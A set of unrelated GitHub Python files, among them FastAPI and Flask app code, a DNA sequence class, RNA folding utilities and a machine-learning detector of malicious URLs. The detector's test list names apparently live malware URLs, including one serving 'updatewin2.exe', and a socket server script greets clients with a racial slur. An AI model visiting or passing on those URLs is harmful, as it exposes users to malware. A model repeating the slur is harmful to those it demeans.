reviews_list.append(rev)\n return {\"reviews\": reviews_list}\n\n@router.post('/block-user')\nasync def block_user(block: Blocked):\n block_table = client[\"SEProject\"][\"Blocked\"]\n block_table.insert_one({\"blocker_email\": block.blocker_email, \"blockee_email\": block.blockee_email})\n return {\"message\": \"User Blocked\"}\n \n@router.post('/report-user')\nasync def report_user(report: Reported):\n report_table = client[\"SEProject\"][\"Reported\"]\n report_table.insert_one({\"reporter_email\": report.reporter_email, \"reportee_email\": report.reportee_email , \"situation\": report.situation , \"additional_comments\" : report.additional_comments, \"approved_by_admin\": 0})\n return {\"message\": \"User Reported\"}\n\n\n\n@router.get('/my-orders/{email}')\nasync def my_orders(email: str):\n order_table = client[\"SEProject\"][\"Order\"]\n orders = order_table.find({\"order_email\": email})\n # orders_list = [dict(order) for order in orders]\n order_list = []\n for order in orders:\n order[\"_id\"] = str(order[\"_id\"])\n order_list.append(order)\n\n return {\"orders\": order_list}\n\n\n# complete order\n@router.put('/complete-order')\nasync def complete_order(order: Completed):\n accept_order_table = client[\"SEProject\"][\"OrderPlaced\"]\n accept_order_table.delete_one({\"order_id\": order.order_id})","repo_name":"LUMS-SE-Project/InGate-Backend","sub_path":"app/routes/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8035966511","text":"#!/usr/bin/env python3\n\"\"\" Task3 \"\"\"\n\nfrom flask_babel import Babel\nfrom flask import Flask, render_template, request, g\nimport pytz\nfrom datetime import datetime\n\n\napp = Flask(__name__)\nbabel = Babel(app)\n\nusers = {\n 1: {\"name\": \"Balou\", \"locale\": \"fr\", \"timezone\": \"Europe/Paris\"},\n 2: {\"name\": \"Beyonce\", \"locale\": \"en\", \"timezone\": \"US/Central\"},\n 3: {\"name\": \"Spock\", \"locale\": \"kg\", \"timezone\": \"Vulcan\"},\n 4: {\"name\": \"Teletubby\", \"locale\": None, \"timezone\": \"Europe/London\"},\n}\nclass Config(object):\n \"\"\"Config class\"\"\"\n LANGUAGES = [\"en\", \"fr\"]\n BABEL_DEFAULT_LOCALE = 'en'\n BABEL_DEFAULT_TIMEZONE = 'UTC'\n\n\napp.config.from_object('app.Config')\n\n\n@app.route('/', strict_slashes=False)\ndef hello():\n \"\"\"hello function\"\"\"\n return render_template('index.html')\n\n\n# @babel.localeselector\ndef get_locale():\n \"\"\"get locale function\"\"\"\n if request.args.get('locale') and request.args.get('locale') in app.config['LANGUAGES']:\n return request.args.get('locale')\n else:\n return request.accept_languages.best_match(app.config['LANGUAGES'])\n \nbabel.init_app(app, locale_selector=get_locale)\n\n\ndef get_timezone():\n user_tz = None\n tz = request.args.get('timezone')\n\n if tz and tz in pytz.all_timezones:\n return tz\n\n user = get_user()\n if user:\n user_tz= user['timezone']\n \n\n if user_tz and user_tz in pytz.all_timezones:\n return user_tz\n\n return app.config.get('BABEL_DEFAULT_TIMEZONE', 'UTC')\n\ndef get_user():\n \"\"\"get user function\"\"\"\n logged = request.args.get(\"login_as\")\n if logged:\n return users.get(int(logged))\n \n \n@app.before_request\ndef handlerequest():\n \"\"\"handlerequest function\"\"\"\n g.user = get_user()\n g.time = get_timezone()\n \n\n\nif __name__ == \"__main__\":\n 
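# hand control to Flask's built-in development server\n    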
app.run()\n","repo_name":"AbdiAbader/alx-backend","sub_path":"0x02-i18n/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17050775306","text":"counter = 1\n\n\nclass DnaSequence:\n\n def __init__(self):\n self.__dna_id = None\n self.__dna_name = None\n self.__dna_string = None\n self.counter = 1\n\n def insert_values(self, dna_id, dna_name, dna_string):\n \"\"\"\n :param dna_id:\n :param dna_name:\n :param dna_string:\n :return: dna's info if managed, false otherwise\n \"\"\"\n global counter\n try:\n if self.is_valid_dna(dna_string):\n self.__dna_id = dna_id\n if dna_name is None:\n dna_name = \"seq{}\".format(counter)\n counter += 1\n self.__dna_name = dna_name\n self.__dna_string = dna_string\n if len(self.__dna_string) > 40:\n sq = self.__dna_string[:40] + \"...\" + self.__dna_string[-3:]\n else:\n sq = self.__dna_string\n return \"[{}] {}: {}\".format(self.__dna_id, self.__dna_name, sq)\n else:\n raise ValueError\n except ValueError:\n return False\n\n def get_id(self):\n \"\"\"\n :return: id of dna_item\n \"\"\"\n return self.__dna_id\n\n def get_name(self):\n \"\"\"\n :return: name of dna_item\n \"\"\"\n return self.__dna_name\n\n def get_string(self):\n \"\"\"\n :return: sequence od dna_item\n \"\"\"\n return self.__dna_string\n\n def is_valid_dna(self, sequence):\n \"\"\"\n checks if sequence is a valid dna sequence\n :param sequence: to be checked\n :return: true if sequence is valid, false otherwise\n \"\"\"\n for char in sequence:\n if char not in 'ACTG':\n return False\n return True\n\n def insert(self, nucleotide, index):\n \"\"\"\n inserts a nucleotide to dna sequence and prints the dna's info, if didn't manage it will print a relevant message\n :param nucleotide: to be inserted\n :param index: where the nucleotide should be inserted\n :return: true if manged, false otherwise\n \"\"\"\n try:\n if nucleotide in 'ACTG':\n if index <= len(self.__dna_string):\n self.__dna_string = self.__dna_string[:index] + nucleotide + self.__dna_string[index:]\n if len(self.__dna_string) > 40:\n sq = self.__dna_string[:40] + \"...\" + self.__dna_string[-3:]\n else:\n sq = self.__dna_string\n print(\"[{}] {}: {}\".format(self.__dna_id, self.__dna_name, sq))\n return True\n else:\n raise IndexError\n except IndexError:\n print(\"Index out of range\")\n return False\n except TypeError:\n print(\"Nucleotide should be one of the next chars: A,C,T,G\")\n return False\n\n def assignment(self, new_dna):\n \"\"\"\n changes the dna's data to be the new dna's data\n :param new_dna:\n :return:true if managed, false otherwise and prints a relevant message\n \"\"\"\n try:\n if type(new_dna) is DnaSequence:\n self.__dna_id = new_dna.__dna_id\n self.__dna_name = new_dna.__dna_name\n self.__dna_string = new_dna.__dna_string\n print(\"[{}] {}: {}\".format(self.__dna_id, self.__dna_name, self.__dna_string))\n return True\n else:\n raise TypeError\n except TypeError:\n print(\"New DNA must be a valid DNA\")\n return False\n\n def __str__(self):\n \"\"\"\n :return: dna's info as string\n \"\"\"\n if len(self.__dna_string) > 40:\n sq = self.__dna_string[:40] + \"...\" + self.__dna_string[-3:]\n else:\n sq = self.__dna_string\n return \"DNA id: {}, name: {}, sequence: {}\".format(self.__dna_id, self.__dna_name, sq)\n\n def __eq__(self, other):\n \"\"\"\n overrides == operator\n :param other: to be checked\n :return: true if equal, false otherwise\n \"\"\"\n try:\n return self.__dna_id 
== other.get_id() and self.__dna_name == other.get_name() and self.__dna_string == other.get_string()\n        except TypeError:\n            print(\"Please send a valid DNA\")\n            return\n\n    def __ne__(self, other):\n        \"\"\"\n        overrides != operator\n        :param other: to be checked\n        :return: true if not equal, false otherwise\n        \"\"\"\n        try:\n            return self.__dna_id != other.get_id() or self.__dna_name != other.get_name() or self.__dna_string != other.get_string()\n        except TypeError:\n            print(\"Please send a valid DNA\")\n            return\n\n    def __getitem__(self, item):\n        try:\n            return self.__dna_string[item]\n        except IndexError:\n            print(\"Index out of range\")\n            return\n\n    def __len__(self):\n        \"\"\"\n        overrides len()\n        :return: the length of the dna's sequence\n        \"\"\"\n        return len(self.__dna_string)\n","repo_name":"miryamduker/DNA-project","sub_path":"dnaSequence.py","file_name":"dnaSequence.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40412131326","text":"#Adam Karim\r\n#https://web.archive.org/web/20170514093208/http://fsecurify.com/using-machine-learning-detect-malicious-urls/ was used to help me create this code. \r\n# The tutorial explains how to create a machine learning algorithm to detect malicious urls\r\n#https://web.archive.org/web/20171206020715if_/https://github.com/faizann24/Using-machine-learning-to-detect-malicious-URLs/tree/master/data \r\n# this was used to provide the clean websites that are imported into the MalwareData.csv\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nimport sys\r\nimport os\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\nimport math\r\nfrom collections import Counter\r\n\r\n#Function getExtension is used to separate the website from extensions such as .com/file.php \r\ndef getExtension(input):\r\n    extBySlash = str(input.encode('utf-8')).split('/')\r\n    allExt = []\r\n    for i in extBySlash:\r\n        extensions = str(i).split('-')\r\n        extByDot = []\r\n        for j in range(0 , len(extensions)):\r\n            tempExt = str(extensions[j]).split('.')\r\n            extByDot = extByDot + tempExt\r\n        allExt = allExt + extensions + extByDot\r\n    allExt = list(set(allExt))\r\n    if 'com' in allExt:\r\n        allExt.remove('com')\r\n    return allExt\r\n\r\n#allurlsData stores the data frame from MalwareData.csv\r\nallurls = './MalwareData.csv'\r\nallurlscsv = pd.read_csv(allurls,',', error_bad_lines=False)\r\nallurlsData = pd.DataFrame(allurlscsv)\r\n\r\n#print(allurlsData)\r\n#this section of the code shuffles the array so all data is not organized to increase entropy\r\nallurlsData = np.array(allurlsData)\r\nrandom.shuffle(allurlsData)\r\n#print(allurlsData)\r\n\r\n\r\n#The TF-IDF vectorizer turns the tokens extracted from each URL into a sparse feature matrix for the classifier\r\ny = [d[1] for d in allurlsData]\t\r\ncorsL = [d[0] for d in allurlsData]\t\r\nvectorizer = TfidfVectorizer(tokenizer=getExtension)\t\r\nX = vectorizer.fit_transform(corsL) \r\n\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\t\r\n#A logistic regression algorithm is used to help classify whether a url is 
malicious or not \r\nlgs = LogisticRegression()\t\r\nlgs.fit(X_train, y_train)\r\nprint(lgs.score(X_test, y_test)) \r\n\r\n#THIS BLOCK DETERMINES IF THE WEBSITE IS MALICIOUS OR NOT.\r\nX_predict = ['https://youtube.com/' , 'https://facebook.com/' , 'http://100.35.47.56:18957/.i' , 'vnjt.top/files/penelop/updatewin2.exe' , 'https://www.youtube.com/']\r\nX_predict = vectorizer.transform(X_predict)\r\ny_Predict = lgs.predict(X_predict)\r\nprint(y_Predict) #printing predicted values\r\n","repo_name":"40super/Senior_Project","sub_path":"senior_project/MalwareDetection/Malware_Detection.py","file_name":"Malware_Detection.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9340247980","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Create Time: 2022/02/05 10:00\n# Create User: NB-Dragon\nimport math\n\n\nclass NetworkTrafficHelper(object):\n def get_speed_and_progress(self, mission_dict: dict, time_interval: int):\n \"\"\"\n :param mission_dict:\n Example: {\"mission_uuid\": {\"update_size\": 0, \"current_size\": 0, \"expect_size\": 0}}\n :param time_interval:\n Example: 0\n :return: {\"mission_uuid\": str, \"progress\": str, \"speed\": str}\n \"\"\"\n speed_content_list = []\n for mission_uuid, mission_item in mission_dict.items():\n progress = self._get_progress_description(mission_item[\"current_size\"], mission_item[\"expect_size\"])\n speed = self._get_speed_description(mission_item[\"update_size\"], time_interval)\n mission_item[\"update_size\"] = 0\n result_item = {\"mission_uuid\": mission_uuid, \"progress\": progress, \"speed\": speed}\n speed_content_list.append(result_item)\n return speed_content_list\n\n @staticmethod\n def get_current_finish_size(section_info):\n finish_size = 0\n for value in section_info.values():\n current_progress = value[\"current_progress\"]\n if len(current_progress) == 0:\n finish_size += value[\"section_size\"]\n elif len(current_progress[0]) == 2:\n incomplete_size = sum([item[1] - item[0] + 1 for item in current_progress])\n finish_size += value[\"section_size\"] - incomplete_size\n return finish_size\n\n @staticmethod\n def _get_progress_description(current_size, expect_size):\n return \"{:.2f}%\".format(current_size / expect_size * 100) if expect_size else \"unknown\"\n\n \"\"\"\n Refer link: https://www.electropedia.org/iev/iev.nsf/display?openform&ievref=112-01-27\n \"\"\"\n\n @staticmethod\n def _get_speed_description(update_size, time_interval):\n update_size_per_second = int(update_size // time_interval) if time_interval else 0\n unit_list = [\"bytes\", \"KiB\", \"MiB\", \"GiB\", \"TiB\", \"PiB\", \"EiB\", \"ZiB\", \"YiB\"]\n unit_index = min(8, int(math.log2(update_size_per_second) / 10)) if update_size_per_second else 0\n format_size = update_size_per_second / (1 << unit_index * 10)\n if unit_index > 0:\n return \"{:.2f}{}/s\".format(format_size, unit_list[unit_index])\n else:\n return \"{}{}/s\".format(int(format_size), unit_list[unit_index])\n","repo_name":"NB-Dragon/AdvancedDownloader","sub_path":"network/NetworkTrafficHelper.py","file_name":"NetworkTrafficHelper.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"21"} +{"seq_id":"6829399294","text":"import socket\n\nHOST = '172.18.120.128'\nPORT = 1234\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind((HOST, PORT))\nserver_socket.listen()\n\nprint(\"Server 
listening on\", HOST, \"port\", PORT)\n\nclient_socket, client_address = server_socket.accept()\nprint(\"Connection from:\", client_address)\n\nmessage = \"Hello, NIGGA!\"\nclient_socket.sendall(message.encode())\n\nwhile True:\n \n received_message = client_socket.recv(1024).decode()\n print(\"Received:\", received_message)\n\n if received_message.lower() == \"bye\":\n response = \"Goodbye!\"\n client_socket.sendall(response.encode())\n break\n\n user_input = input(\"Enter your response: \")\n client_socket.sendall(user_input.encode())\n\nclient_socket.close()\nserver_socket.close()\n","repo_name":"shaheen-senpai/S7DSLAB","sub_path":"Sent Nuclear Codes/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74296350771","text":"from selenium.webdriver import Chrome\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nfrom lib.Logger import log_to_file\nfrom config.TestConstants import TestConstants\nclass SeleniumDriverManager:\n\n browser = TestConstants.BROWSER\n\n def __init__(self):\n log_to_file.debug(\"Inside Selenium driver manager...\")\n self._driver = None\n\n @property\n def driver(self):\n if self._driver is None:\n if SeleniumDriverManager.browser == \"chrome\":\n log_to_file.debug(\"Initializing chrome browser...\")\n self._driver = Chrome(service=Service(ChromeDriverManager().install()))\n self._driver.implicitly_wait(TestConstants.IMPLICIT_TIMEOUT)\n\n elif SeleniumDriverManager.browser == \"firefox\":\n log_to_file.debug(\"Initializing firefox browser...\")\n self._driver = Firefox(service=Service(GeckoDriverManager().install()))\n else:\n log_to_file.debug(\"Initializing of chrome or firefox browser failed...\")\n raise AttributeError(\"Unsupported browser: {}\".format(SeleniumDriverManager.browser))\n return self._driver\n\n\n @property\n def driver_wait(self):\n log_to_file.debug(\"Initializing webdriver wait...\")\n self._driver_wait = WebDriverWait(self.driver, TestConstants.EXPLICIT_TIMEOUT)\n return self._driver_wait\n\n\n\n","repo_name":"gurudattvshenoy/selenium_python","sub_path":"lib/SeleniumDriverManager.py","file_name":"SeleniumDriverManager.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37486683607","text":"from itertools import combinations\n\n\ndef solution(number, k):\n tmp = []\n for i in number:\n tmp.append(i)\n combi = list(combinations(tmp, len(number) - k))\n\n setting = []\n for com in combi:\n for i, j in enumerate(com):\n if i == 0:\n number = j\n else:\n number += j\n setting.append(number)\n setting = sorted(setting)\n return setting[-1]\n\n## 시간초과뜨는데 다른 방법을 못찾겠음.","repo_name":"DrunkJin/CosMos","sub_path":"220606-220612/p42883/seojin_p42883.py","file_name":"seojin_p42883.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"15351305849","text":"#!/usr/bin/env python\n# coding=future_fstrings\nfrom __future__ import print_function\n\n__license__ = \"MIT\"\n__authors__ = [\"Marvin Jens\"]\n__email__ = \"mjens@mit.edu\"\n\nimport sys\nimport os\nimport logging\nimport copy\nimport time\nimport numpy as 
np\nimport pickle as pickle\nfrom subprocess import PIPE, Popen\nfrom multiprocessing import Process, Event, JoinableQueue as Queue\nimport multiprocessing\nfrom collections import defaultdict\nfrom RBPamp.caching import CachedBase, cached, pickled\nimport RBPamp.cyska as cyska\nlogger = logging.getLogger(\"fold\")\n\n# This global variable is used by the keyboard interrupt \n# handler to decide if we need to flush stuff to disk\nfolding_in_progress = False\n \nclass RBNSOpenen(CachedBase):\n \"\"\"\n Analogous to RBNSReads, which holds the raw sequences, instances of this class hold \n open-energies for all kmer start-positions inside the raw sequences. \n Since one file with reads produces multiple openen files (one for each k) and\n these furthermore may exist in raw or discretized form, an OpenenStorage instance\n should be used to encapsulate transparent access to the underlying \n files.\n \"\"\"\n def __init__(self, fname, rbns_reads, k, oem=[], disc=None, dummy=False, acc_scale=1., **kwargs):\n\n CachedBase.__init__(self, **kwargs)\n\n self.fname = fname\n self.rbns_reads = rbns_reads\n \n self.k = k\n self.discretized = (\"discretized\" in self.fname)\n self.T = rbns_reads.temp\n self.RT = rbns_reads.RT\n self.acc_scale = acc_scale\n self.logger = logging.getLogger('fold.RBNSOpenen')\n self.missing_data = False\n \n # to be initialized upon first access to oem\n self.include_adapters = None\n self.ofs = 0\n self.dummy = dummy\n \n if self.discretized:\n # recovering discretization scheme from file-name\n self.disc = OpenenDiscretization.from_filename(fname)\n self.dtype = self.disc.dtype\n self.acc_lookup = np.exp(- self.disc.x/self.RT)\n else:\n # we have the raw floating point values\n self.disc = None\n self.dtype = np.float32\n self.acc_lookup = []\n\n if len(oem):\n self.cache_preload(\"oem\", oem)\n N, L = oem.shape\n self.cache_preload(\"N\", N)\n self.cache_preload(\"L\", L)\n self.is_subsample = True\n else:\n self.is_subsample = False\n\n self.logger.debug(\"initialized for data from '{self.fname}' @{self.T} C\".format(self=self))\n \n @classmethod\n def from_array(cls, reads, k, oem, dtype=np.uint8, mode='gamma', **kwargs):\n \n L = oem.shape[1]\n fname = \"discretized_{mode}_L{L}_k{k}_{dtype.__name__}\".format(**locals())\n openen = cls(fname, reads, k, **kwargs)\n openen._do_not_unpickle = True\n openen._do_not_pickle = True\n N, L = oem.shape\n \n openen.cache_preload(\"oem\", oem)\n openen.cache_preload(\"N\", N)\n openen.cache_preload(\"L\", L)\n \n return openen\n \n @property\n def cache_key(self):\n return \"RBNSOpenen({self.rbns_reads.cache_key}) k={self.k} disc={self.disc} nmax={self.rbns_reads.n_max}\".format(self=self)\n\n @property\n @cached\n @pickled\n def N(self):\n N, L = self.oem.shape\n return N\n\n @property\n @cached\n @pickled\n def L(self):\n N, L = self.oem.shape\n return L\n \n def count_records(self, with_adapter=True):\n \"\"\"return the number of complete records based on file-size\"\"\"\n if not os.path.exists(self.fname):\n return 0\n\n l = self.rbns_reads.L - self.k + 1\n if with_adapter:\n l += self.rbns_reads.l5 + self.rbns_reads.l3\n\n itemsize = np.dtype(self.dtype).itemsize\n N_items = os.path.getsize(self.fname) / itemsize\n \n return int(np.floor(N_items / l))\n\n def check_data(self, with_adapter=True):\n if self.count_records(with_adapter=with_adapter) == self.rbns_reads.N:\n return True\n\n @property\n # @cached\n def oem(self):\n \"\"\"\n load and keep all open-energies in memory (optionally discretized)\n \"\"\"\n 
self.logger.debug(\"loading open energies from {self.fname}\".format(self=self) )\n #oem = np.fromfile(self.fname, dtype=self.dtype)\n N = self.rbns_reads.N\n l = self.rbns_reads.L - self.k + 1\n l_adap = l + self.rbns_reads.l5 + self.rbns_reads.l3\n\n oem = None\n if not os.path.exists(self.fname):\n self.logger.warning(\"file '{}' not found. Assuming accessibility = 1\".format(self.fname))\n self.l_row = l_adap\n self.include_adapters = True\n self.ofs = self.rbns_reads.l5\n self.missing_data = True\n return np.zeros( (N, self.l_row), dtype=self.dtype)\n\n # we need to load from disk\n itemsize = np.dtype(self.dtype).itemsize\n N_items = os.path.getsize(self.fname) / itemsize\n L = N_items / float(N)\n\n self.logger.debug(\"open-energy row l={0}\".format(L))\n if L == l:\n self.logger.info(\"data excludes adapters L={0}\".format(L))\n self.l_row = l\n self.include_adapters = False\n self.ofs = 0\n \n elif L == l_adap:\n self.logger.info(\"data covers adapters L={0}\".format(L))\n self.l_row = l_adap\n self.include_adapters = True\n self.ofs = self.rbns_reads.l5\n\n elif L > l_adap:\n n_file = N_items / l_adap\n if self.rbns_reads.n_max:\n pass\n # it's okay that we truncate!\n else:\n self.logger.warning(\"file contains {n_file} rows (assuming it includes adapters) but only {self.rbns_reads.N} reads are loaded. Truncating!\".format(**locals()) )\n\n self.ofs = self.rbns_reads.l5\n self.include_adapters = True\n self.l_row = l_adap\n else:\n delta = L - ( l + self.rbns_reads.l5 + self.rbns_reads.l3 )\n raise ValueError(\"size of open energy matrix {L} does not match the reads {self.rbns_reads.L} even when accounting for 5' {self.rbns_reads.l5} and 3' {self.rbns_reads.l3} adapters. Delta = {delta}!\".format(**locals()) )\n \n # read the actual data. Only as much as needed!\n import time\n import mmap\n from contextlib import closing\n N_bytes = self.l_row * N * itemsize\n # N_bytes = self.l_adap * N * itemsize\n N_needed = self.l_row * N\n\n t0 = time.time()\n oem = np.memmap(self.fname, dtype=self.dtype, mode='r')[:N_needed]\n # with open(self.fname, 'rb') as f:\n # with closing(mmap.mmap(f.fileno(), length=N_bytes, access=mmap.ACCESS_READ)) as m:\n # oem = np.frombuffer(m, dtype=self.dtype)\n\n dt = 1000. 
* (time.time() - t0)\n self.logger.debug(\"loading {N} rows of open-energy from {self.fname} took {dt:.2f} ms.\".format(**locals()))\n oem = oem.reshape( (N, self.l_row) )\n return oem\n \n @property\n # @cached\n def acc(self):\n if self.dummy:\n return np.ones(self.oem.shape, dtype=np.float32)\n\n if not self.discretized:\n return np.exp(-self.oem*self.acc_scale/self.RT)\n else:\n return self.acc_lookup[self.oem]\n \n def discretize(self, disc=None, dname=None):\n \n if not disc:\n disc = OpenenDiscretization.from_filename(dname)\n\n self.logger.debug(\"discretizing {0} using {1}\".format(self.fname, disc.to_filename(N=self.rbns_reads.N)) )\n t0 = time.time()\n \n d_oem = disc.discretize(self.oem)\n if not dname:\n path, fname = os.path.split(self.fname)\n dname = os.path.join(path, \"{0}.{1}\".format(disc.to_filename(N=self.rbns_reads.N), fname) )\n\n doe = RBNSOpenen(\n dname,\n self.rbns_reads,\n self.k,\n oem = d_oem,\n )\n doe.include_adapters = self.include_adapters\n doe.ofs = self.ofs\n \n dt = time.time() - t0\n self.logger.debug(\"discretization took {0:.1f} seconds\".format(dt) )\n return doe\n \n def integrate(self, integrand, bin_weights):\n assert self.discretized\n return np.trapz(integrand * bin_weights, self.disc.x)\n\n @cached\n @pickled\n def kmer_openen_counts(self):\n return cyska.kmer_openen_counts(self.rbns_reads.seqm, self.oem, self.k)\n \n @cached\n #@pickled\n def get_kmer_openen_profile(self, kmer):\n kmer_index = cyska.seq_to_index(kmer)\n k_seq = len(kmer)\n return cyska.kmer_openen_profile(self.rbns_reads.get_index_matrix(k_seq), self.oem, k_seq, kmer_index, self.k, self.ofs)\n \n #@cached\n #@pickled\n def kmer_mean_openen_profiles(self, k_seq=None):\n self.logger.debug(\"computing kmer_mean_openen_profiles...\" )\n \n if k_seq == None:\n k_seq = self.k\n\n seqm = self.rbns_reads.seqm\n oem = self.oem\n\n t0 = time.time()\n res = cyska.kmer_mean_openen_profiles(seqm, oem, np.array(self.disc.x), k_seq, self.k, self.ofs)\n dt = time.time() - t0\n self.logger.debug(\"kmer_mean_openen_profiles took {0:.1f} seconds\".format(dt) )\n\n return res\n\n def store(self):\n self.logger.info(\"storing open-energies as '{0}'\".format(self.fname) )\n self.oem.tofile(self.fname)\n\n\n\n\nclass ViennaOpenen(object):\n \"\"\"\n Wrapper around an RNAplfold_RBPamp (modified RNAplfold) subprocess.\n \"\"\"\n def __init__(self, k_min=3, k_max=8, temp=22., adap5=\"gggaguucuacaguccgacgauc\", adap3=\"uggaauucucgggugucaagg\", vienna_bin=\"RNAplfold_RBPamp\", l_insert=20, skip_adap=False, **kwargs):\n \n L = len(adap5) + l_insert + len(adap3)\n self.logger = logging.getLogger('fold.ViennaOpenen')\n \n # create the folding sub-process\n cmd=[vienna_bin, \"-O\", \"-u {0}\".format(k_max), \"-W {0}\".format(L), \"-L {0}\".format(L), \"-T {0}\".format(temp)]\n self.cmd = \" \".join(cmd)\n try:\n self.p = Popen(\n cmd, \n stdin=PIPE, \n stdout=PIPE, \n bufsize=1, \n close_fds=True\n )\n except FileNotFoundError:\n self.logger.error(f\"Can not start the RNAplfold binary '{vienna_bin}'\")\n sys.exit(1)\n \n # prepare constant variables needed in batch-processing\n self.k_indices = np.arange(k_min, k_max+1)\n \n # which part of the sequence we are actually interested in\n self.first = 0\n self.last = L\n \n if skip_adap:\n self.first = len(adap5)\n self.last = L - len(adap3)\n\n self.l_insert = self.last - self.first\n self.krange = np.arange(k_min, k_max+1)\n self.k_min = k_min\n self.k_max = k_max\n \n self.adap5 = adap5\n self.adap3 = adap3\n \n self.n_total = 0\n 
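# --- Added example (hedged sketch) ---
# The acc property above turns open energies into accessibilities through a
# Boltzmann factor, acc = exp(-E_open * scale / RT):
import numpy as np

RT = 0.593  # kcal/mol near 25 C; the class derives RT from the read temperature
open_energies = np.array([0.0, 1.0, 5.0], dtype=np.float32)
accessibility = np.exp(-open_energies / RT)
# zero opening cost -> fully accessible; each extra kcal/mol decays sharply
assert accessibility[0] == 1.0 and accessibility[1] < 0.2 and accessibility[2] < 1e-3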
self.logger.info(\"initialized for adap5='{self.adap5}' adap3='{self.adap3}' l_insert = {self.l_insert} k_min={self.k_min} k_max={self.k_max} first={self.first} last={self.last}\".format(self=self) )\n\n def process_sequences(self, seq_src):\n \"\"\"\n Generator that folds the sequences from seq_src and yields (krange, data)\n tuples for each sequence.\n krange is range(self.k_min, self.k_max+1) as specified in __init__ and\n data[k][i] is the open-energy for window of size k starting at position i (zero-based).\n \n Can be called multiple times. The subprocess will not be closed unless close() is called.\n \"\"\"\n n = 0\n for seq in seq_src:\n S = self.adap5 + seq.rstrip() + self.adap3\n l = len(S)\n #print \"folding\", S, len(S)\n self.p.stdin.write(\"{0}\\n\".format(S).encode('ascii'))\n self.p.stdin.flush()\n \n data = [ np.zeros(self.l_insert - k + 1, dtype=np.float32) for k in self.krange ]\n for i in range(l+2):\n j = i - 2\n line = self.p.stdout.readline()\n \n if j < self.first:\n continue\n \n if j >= self.last:\n continue\n \n cols = line.split(b'\\t')\n # print(cols)\n for k in self.krange:\n if j >= (k-1):\n data[k - self.k_min][j-k-self.first+1] = float(cols[k])\n\n yield self.krange, data\n n += 1\n\n #self.logger.debug('folded {0} sequences'.format(n))\n self.n_total += n\n \n\n def close(self):\n \"\"\"\n Close subprocess file-descriptors and wait for clean exit.\n \"\"\"\n self.p.stdin.close()\n self.p.stdin.close()\n ex = self.p.wait()\n self.logger.debug('close(): {0} exited with code {1} after folding {2} sequences'.format(self.cmd, ex, self.n_total) )\n \nclass DummySink(object):\n def __init__(self, fname):\n self.fname = fname\n self.bytes_written = 0\n self.bytes_found = 0\n\n def write(self, *argcs, **kwargs):\n pass\n\n def close(self):\n pass\n\nclass FileSink(object):\n def __init__(self, fname, bytes_keep=0):\n self.fname = fname\n self.f = open(fname, 'ab+')\n logger = logging.getLogger(\"fold.FileSink\")\n logger.warning(f'opened file {fname} in mode ab+')\n\n if bytes_keep:\n # print \"keeping {} bytes\".format(bytes_keep)\n self.f.seek(bytes_keep)\n self.f.truncate()\n\n self.bytes_written = 0\n self.bytes_found = bytes_keep\n \n def write(self, *argcs, **kwargs):\n self.f.write(*argcs, **kwargs)\n self.bytes_written += len(argcs[0])\n\n def close(self):\n self.f.flush()\n self.f.close()\n # print \"expected file-size\", self.fname, self.bytes_written + self.bytes_found, os.path.getsize(self.fname)\n \n\nclass OpenenStorage(CachedBase):\n def __init__(self, reads, path='./', discretize=False, raw_dtype=np.float32, disc_dtype=np.uint8, disc_mode='gamma', dummy=False, T=22., **kwargs):\n \n CachedBase.__init__(self)\n \n self.path = path\n self.reads = reads\n self.raw_dtype = raw_dtype\n self.disc_dtype = disc_dtype\n self.disc_mode = disc_mode\n self.T = T\n self.k_sinks = {}\n self.k_disc = {}\n self.logger = logging.getLogger('fold.OpenenStorage({self.reads.name})'.format(self=self))\n self.n_sets = 0\n self.discretize = discretize\n self.dummy = dummy\n self.kwargs = kwargs\n if dummy:\n self.write = self.dummy_write\n\n @property\n def cache_key(self):\n return \"OpenenStorage({})\".format(self.reads.cache_key)\n\n @cached\n def get_raw(self, k):\n return RBNSOpenen(self._make_filename(k), self.reads, k, dummy=self.dummy, **self.kwargs)\n \n @cached\n def get_discretized(self, k, disc_mode = ''):\n if not disc_mode:\n disc_mode = self.disc_mode\n \n disc = OpenenDiscretization(k, self.reads.L, self.disc_dtype, mode=disc_mode)\n self.k_disc[k] = disc\n 
